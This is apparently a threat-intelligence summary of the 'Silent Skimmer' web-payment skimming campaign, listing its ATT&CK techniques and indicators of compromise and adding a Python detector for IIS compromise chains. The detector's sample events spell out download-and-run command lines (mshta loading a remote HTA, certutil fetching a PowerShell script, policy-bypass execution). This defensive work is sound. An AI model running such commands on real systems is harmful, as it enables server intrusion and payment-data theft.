Silent Skimmer: Online Payment Scraping Campaign Shifts Targets From APAC to NALA

BlackBerry researchers identify a financially motivated campaign, dubbed “Silent Skimmer,” targeting online payment infrastructure across APAC and NALA with web-server compromises to steal payment data. The operation leverages vulnerabilities in web applications, a suite of post-exploitation tools, and a modular C2/hosting network (including HTTP File Servers and fast flux) to scrape and exfiltrate user payment details. Hashtags: #SilentSkimmer #Godzilla #TelerikUI #CVE2019-18935 #IIS #PowerShellRAT #CobaltStrike

Key Points

  • Silent Skimmer targets payment-processing websites and IIS-hosted web apps in APAC and North America, operating for over a year.
  • Initial access is achieved by exploiting web applications (notably CVE-2019-18935) to gain access and deploy post-exploitation tools.
  • Attackers deploy obfuscated JavaScript (compiled.js, jquery.hoverIntent.js, checkout.js) to scrape payment data and exfiltrate it via HTTP requests.
  • Tools on the attacker’s HTTP File Server (HFS) include BadPotato, Godzilla webshells, PowerShell RAT (server.ps1), HTA downloaders, and Cobalt Strike beacons.
  • Exfiltration is staged through fast flux infrastructure and domains such as www.krispykreme.one and nigntboxcdn.com.
  • The campaign shifts focus from APAC toward Canada/USA, adapting its network infrastructure (VPS hosts in various locations, NAT traversal via Fast Reverse Proxy (FRP)) to evade detection.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of CVE-2019-18935 can result in remote code execution. The initial payload is a .NET assembly DLL generated using ihoney’s CVE-2019-18935 implementation.
  • [T1105] Ingress Tool Transfer – The HTA file performs an ingress tool transfer via certutil.exe to download server.ps1 from 4.216.137.19.
  • [T1059.001] Command and Scripting Interpreter: PowerShell – After pivoting to PowerShell, the attackers run server.ps1, a remote access tool that lets them control the victim’s computer remotely.
  • [T1083] File and Directory Discovery – The attackers check inetpub\wwwroot for specific files during the intrusion.
  • [T1218.005] Signed Binary Proxy Execution: Mshta – The malicious DLL uses Mshta.exe to execute an HTML Application (MsMsp.hta) directly from an external IP.
  • [T1068] Exploitation for Privilege Escalation – Privilege escalation is achieved by manipulating access tokens.
  • [T1134] Access Token Manipulation – Privilege escalation via token manipulation is described in the campaign.
  • [T1105] Ingress Tool Transfer – See above; the VBScript/Mshta chain downloads and loads additional payloads.
  • [T1071.001] Web Protocols – C2 communications occur over HTTP/HTTPS, including the hardcoded C2 and HTTP File Server usage.
  • [T1041] Exfiltration – Payment data is exfiltrated to remote servers after being processed and encoded.
  • [T1027] Obfuscated/Compressed Files and Information – The attackers use obfuscated JavaScript files to hide exfiltration logic.
  • [T1090] Proxy – Fast Reverse Proxy (FRP) and NAT traversal techniques are used to expose internal resources to the Internet.
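The T1190 → T1218.005 → T1105 → T1059.001 chain above maps cleanly onto process-creation telemetry: an IIS worker process spawning mshta.exe with a remote URL, certutil.exe pulling a script, then PowerShell executing it. The detection below is an added example written for this summary, not code from the BlackBerry report; it assumes Sysmon-style Image/ParentImage/CommandLine fields, and the events, IPs and paths are constructed (TEST-NET addresses, not IoCs from the campaign).

```python
import re

# Constructed sample events, field order: Image|ParentImage|CommandLine.
# Modelled on the Silent Skimmer chain; addresses are documentation-range placeholders.
SAMPLE_EVENTS = [
    "w3wp.exe|svchost.exe|C:\\Windows\\System32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\"",
    "mshta.exe|w3wp.exe|mshta.exe http://203.0.113.10/MsMsp.hta",
    "certutil.exe|mshta.exe|certutil.exe -urlcache -split -f http://203.0.113.11/server.ps1 C:\\Windows\\Temp\\server.ps1",
    "powershell.exe|certutil.exe|powershell.exe -ep bypass -f C:\\Windows\\Temp\\server.ps1",
    "notepad.exe|explorer.exe|notepad.exe C:\\Users\\a\\notes.txt",          # benign
    "mshta.exe|explorer.exe|mshta.exe C:\\Program Files\\Vendor\\setup.hta",  # local HTA, benign
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
EP_BYPASS_RE = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.IGNORECASE)
IIS_WORKER = "w3wp.exe"  # assumption: IIS application-pool worker process name
INTERPRETERS = {"cmd.exe", "powershell.exe", "mshta.exe", "certutil.exe"}


def classify(event: str) -> list[str]:
    """Return the detection tags that apply to one pipe-delimited event."""
    image, parent, cmdline = event.split("|", 2)
    image, parent, lowered = image.lower(), parent.lower(), cmdline.lower()
    tags = []
    # Mshta fetching an HTA from a remote host rather than a local path.
    if image == "mshta.exe" and URL_RE.search(cmdline):
        tags.append("T1218.005 mshta remote HTA")
    # certutil used as a downloader (-urlcache with a URL argument).
    if image == "certutil.exe" and "-urlcache" in lowered and URL_RE.search(cmdline):
        tags.append("T1105 certutil download")
    # PowerShell launched with execution policy bypass to run a dropped script.
    if image == "powershell.exe" and EP_BYPASS_RE.search(cmdline) and ".ps1" in lowered:
        tags.append("T1059.001 powershell script with policy bypass")
    # Any interpreter whose parent is the IIS worker: a strong web-shell / RCE signal.
    if parent == IIS_WORKER and image in INTERPRETERS:
        tags.append("T1190 IIS worker spawned interpreter")
    return tags


def scan(events: list[str]) -> dict[int, list[str]]:
    """Map each suspicious event index to its tags; benign events are omitted."""
    return {i: tags for i, e in enumerate(events) if (tags := classify(e))}


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].split("|", 2)[2], "->", tags)
```

Feeding real process-creation events into `scan` and alerting when two or more of these tags appear within a short window on one host catches the chain even if any single stage is tuned out as noise.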

Indicators of Compromise

  • [Hash] ae89f5aa5c2dc71f4d86d9018000e92940558f3e5fe18542f48dea3b607c7d3b – server.ps1 (Appendix 1)
  • [Hash] 1afd47f1e914bde661778966334270c4e3c47b88cbad8ca24babbe1220ac2204 – win.ps1 (Appendix 1)
  • [Hash] 810b0ff0eebadc4d7f0c44f1d321121d55a477bd1a92d1ec89314a81b4c3601f – One.ps1 (Appendix 1)
  • [Domain] www.krispykreme.one/Check.ashx – Payment data exfiltration destination
  • [Domain] hxxps://cdn.nigntboxcdn.com/Nigntboxcdngetdata.php – Payment data exfiltration destination
  • [IP] 52.253.105.171 – IP used to host MsMsp.hta/serve content
  • [IP] 157.254.194.232 – Source for modified jquery.hoverIntent.js during intrusion
  • [IP] 4.216.137.19 – Server hosting server.ps1 download
  • [Domain] tk.tktktkcscscs.com – Hardcoded C2 domain in PowerShell RAT

Read more: https://blogs.blackberry.com/en/2023/09/silent-skimmer-online-payment-scraping-campaign-shifts-targets-from-apac-to-nala